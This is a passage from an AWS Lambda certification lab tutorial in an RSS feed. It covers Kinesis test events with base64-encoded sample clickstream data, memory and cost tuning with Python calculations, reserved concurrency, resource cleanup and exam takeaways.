        "data": "eyJ1c2VySWQiOiJVU0VSLTAwMSIsInBhZ2UiOiIvcHJvZHVjdHMvbGFwdG9wIiwiYWN0aW9uIjoidmlldyIsInRpbWVzdGFtcCI6IjIwMjYtMDQtMjRUMTA6MDA6MDBaIn0="
      },
      "eventSource": "aws:kinesis",
      "eventSourceARN": "arn:aws:kinesis:us-east-1:123456789012:stream/clickstream"
    },
    {
      "kinesis": {
        "data": "eyJ1c2VySWQiOiJVU0VSLTAwMiIsInBhZ2UiOiIvY2hlY2tvdXQiLCJhY3Rpb24iOiJjbGljayIsInRpbWVzdGFtcCI6IjIwMjYtMDQtMjRUMTA6MDE6MDBaIn0="
      },
      "eventSource": "aws:kinesis",
      "eventSourceARN": "arn:aws:kinesis:us-east-1:123456789012:stream/clickstream"
    }
  ]
}
&lt;/code&gt;&lt;/pre&gt;
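&lt;p&gt;The &lt;code&gt;data&lt;/code&gt; fields above are base64-encoded, which is how Kinesis hands records to Lambda. Decoding them shows what the handler actually parses:&lt;/p&gt;

```python
import base64
import json

# The base64 "data" fields from the test event above. Decoding them
# recovers the original clickstream JSON the handler works with.
encoded = [
    "eyJ1c2VySWQiOiJVU0VSLTAwMSIsInBhZ2UiOiIvcHJvZHVjdHMvbGFwdG9wIiwiYWN0aW9uIjoidmlldyIsInRpbWVzdGFtcCI6IjIwMjYtMDQtMjRUMTA6MDA6MDBaIn0=",
    "eyJ1c2VySWQiOiJVU0VSLTAwMiIsInBhZ2UiOiIvY2hlY2tvdXQiLCJhY3Rpb24iOiJjbGljayIsInRpbWVzdGFtcCI6IjIwMjYtMDQtMjRUMTA6MDE6MDBaIn0=",
]

events = [json.loads(base64.b64decode(e)) for e in encoded]
for ev in events:
    print(ev["userId"], ev["page"], ev["action"], ev["timestamp"])
```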

&lt;p&gt;&lt;strong&gt;Step 04:&lt;/strong&gt; Change memory to &lt;strong&gt;256 MB&lt;/strong&gt; → test again&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 05:&lt;/strong&gt; Change to &lt;strong&gt;512 MB&lt;/strong&gt; → test again&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 06:&lt;/strong&gt; Change to &lt;strong&gt;1024 MB&lt;/strong&gt; → test again&lt;/p&gt;

&lt;p&gt;You'll typically see:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;strong&gt;Memory&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;Duration&lt;/th&gt;
&lt;th&gt;Billed Duration&lt;/th&gt;
&lt;th&gt;&lt;em&gt;Cost per Invocation&lt;/em&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;128 MB&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~200ms&lt;/td&gt;
&lt;td&gt;200ms&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Low per-ms, but slow&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;256 MB&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~110ms&lt;/td&gt;
&lt;td&gt;110ms&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Sweet spot for many functions&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;512 MB&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~60ms&lt;/td&gt;
&lt;td&gt;60ms&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Faster, slightly more per-ms&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;1024 MB&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~55ms&lt;/td&gt;
&lt;td&gt;55ms&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Diminishing returns&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;The sweet spot is where increasing memory no longer significantly reduces duration.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
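&lt;p&gt;The trade-off is easy to sanity-check with GB-second math. A quick sketch (the per-GB-second price is an assumption based on published us-east-1 pricing; substitute your region's current rate):&lt;/p&gt;

```python
# Rough GB-second math behind the table above. The price per GB-second
# is an assumption; check your region's current Lambda pricing.
PRICE_PER_GB_SECOND = 0.0000166667

# memory (MB) mapped to the measured duration in seconds
configs = {128: 0.200, 256: 0.110, 512: 0.060, 1024: 0.055}

costs = {}
for mb, seconds in configs.items():
    gb_seconds = (mb / 1024) * seconds
    costs[mb] = gb_seconds * PRICE_PER_GB_SECOND
    print(f"{mb} MB: {gb_seconds:.4f} GB-s, ${costs[mb]:.10f} per invocation")

# With these numbers, 512 MB runs roughly 3x faster than 128 MB for only
# about 20% more cost, while 1024 MB barely helps: the sweet spot.
```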

&lt;p&gt;&lt;strong&gt;Step 07:&lt;/strong&gt; Concurrency Settings&lt;br&gt;
&lt;strong&gt;Configuration&lt;/strong&gt; → &lt;strong&gt;Concurrency and recursion detection&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;Concurrency&lt;/strong&gt; → &lt;strong&gt;Edit&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 08:&lt;/strong&gt; &lt;strong&gt;Edit concurrency&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Use unreserved account concurrency:&lt;/strong&gt; Uses the shared regional pool (default 1000)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reserve concurrency:&lt;/strong&gt; Guarantees capacity AND caps the function&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Select &lt;strong&gt;Reserve concurrency:&lt;/strong&gt; &lt;code&gt;50&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Click &lt;strong&gt;Save&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Your changes have been saved.&lt;/p&gt;

&lt;p&gt;This means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your function is guaranteed 50 concurrent executions&lt;/li&gt;
&lt;li&gt;It can never exceed 50 (acts as a throttle)&lt;/li&gt;
&lt;li&gt;The remaining 950 are available for other functions&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Reserved concurrency is free and serves two purposes&lt;/strong&gt;: guaranteeing capacity AND protecting downstream services from being overwhelmed. Provisioned concurrency costs money even when idle but eliminates cold starts.&lt;/p&gt;
&lt;/blockquote&gt;
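&lt;p&gt;A useful cross-check: a Kinesis event source mapping drives at most shards × parallelization factor concurrent invocations, so you can verify the reserved limit leaves headroom. A sketch, assuming a single-shard stream (as in a minimal lab setup):&lt;/p&gt;

```python
# Back-of-envelope check that the Kinesis trigger cannot exhaust the
# reserved concurrency. Max concurrent invocations from an event source
# mapping is shards multiplied by the parallelization factor.
shards = 1                    # assumption: a single-shard lab stream
parallelization_factor = 10   # "Concurrent batches per shard" above
reserved_concurrency = 50

stream_concurrency = shards * parallelization_factor
headroom = reserved_concurrency - stream_concurrency
print(f"Stream drives up to {stream_concurrency} concurrent invocations; "
      f"{headroom} of the reserved limit remains as headroom")
```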




&lt;h2&gt;
  
  
  🏗️ What You Built | 📘Exam Concepts Recap
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;strong&gt;What You Did&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;em&gt;Exam Concept&lt;/em&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Created a Lambda function and configured memory/timeout&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Lambda configuration parameters&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Built and attached a Lambda Layer&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Sharing code across functions, layer structure and limits&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Set up a DLQ and Lambda Destinations&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Async error handling, event lifecycle&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Used &lt;code&gt;--invocation-type Event&lt;/code&gt; to trigger async flow&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Synchronous vs asynchronous invocation types&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Attached Lambda to a VPC with subnets and security group&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;VPC access for private resources (RDS, ElastiCache)&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Initialized SDK clients outside the handler&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Connection reuse, cold start optimization&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Created a Kinesis stream and connected it to Lambda&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Real-time data processing, event source mappings&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Configured batch size, batch window, parallelization factor&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Kinesis + Lambda tuning for throughput&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Enabled bisect batch on error&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Isolating bad records in stream processing&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Changed memory settings and compared Duration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Performance tuning, memory = CPU relationship&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Set reserved concurrency&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Throttling, capacity guarantees, protecting downstream services&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  ⚠️ Clean Up Protocol
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;1.&lt;/strong&gt; &lt;strong&gt;Lambda&lt;/strong&gt; → Delete &lt;code&gt;DataProcessor&lt;/code&gt;, &lt;code&gt;ClickstreamProcessor&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;2.&lt;/strong&gt; &lt;strong&gt;Lambda Layers&lt;/strong&gt; → Delete &lt;code&gt;shared-utils&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;3.&lt;/strong&gt; &lt;strong&gt;Kinesis&lt;/strong&gt; → Delete &lt;code&gt;clickstream&lt;/code&gt; stream&lt;br&gt;
&lt;strong&gt;4.&lt;/strong&gt; &lt;strong&gt;SQS&lt;/strong&gt; → Delete &lt;code&gt;data-processor-dlq&lt;/code&gt;, &lt;code&gt;data-processor-success&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;5.&lt;/strong&gt; &lt;strong&gt;IAM&lt;/strong&gt; → Delete the Lambda execution roles&lt;br&gt;
&lt;strong&gt;6.&lt;/strong&gt; &lt;strong&gt;CloudWatch&lt;/strong&gt; → Delete the log groups&lt;/p&gt;




&lt;h2&gt;
  
  
  Key Takeaways
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Memory = CPU:&lt;/strong&gt; more memory means more CPU. &lt;em&gt;Find the sweet spot where cost and performance balance.&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Initialize outside the handler:&lt;/strong&gt; SDK clients, DB connections, config loading. &lt;em&gt;Reused across warm invocations.&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lambda Destinations &amp;gt; DLQ:&lt;/strong&gt; Destinations capture success AND failure with more context.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ReportBatchItemFailures&lt;/strong&gt; for SQS, &lt;strong&gt;BisectBatchOnFunctionError&lt;/strong&gt; for Kinesis to isolate bad records.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;VPC Lambda loses internet:&lt;/strong&gt; needs NAT Gateway or VPC endpoints for AWS services.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;RDS Proxy&lt;/strong&gt; for Lambda-to-RDS: manages connection pooling.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layers:&lt;/strong&gt; up to 5 per function, 250 MB total unzipped, versioned and immutable.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;15-minute timeout&lt;/strong&gt; is the max: for longer tasks, use Step Functions or ECS.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Provisioned concurrency:&lt;/strong&gt; eliminates cold starts but costs money when idle.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kinesis parallelization factor:&lt;/strong&gt; (1–10) lets you process multiple batches per shard.&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  Additional Resources
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/lambda/latest/dg/welcome.html" rel="noopener noreferrer"&gt;What Is AWS Lambda&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/lambda/latest/dg/with-kinesis.html" rel="noopener noreferrer"&gt;Using Lambda to process records from Amazon Kinesis Data Streams&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/lambda/latest/dg/configuration-function-common.html" rel="noopener noreferrer"&gt;Configuring AWS Lambda functions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/lambda/latest/dg/best-practices.html" rel="noopener noreferrer"&gt;Best practices for working with AWS Lambda functions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/lambda/latest/dg/configuration-concurrency.html" rel="noopener noreferrer"&gt;Configuring reserved concurrency for a function&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;





</description>
      <category>aws</category>
      <category>certification</category>
      <category>cloud</category>
      <category>developer</category>
    </item>
  </channel>
</rss>
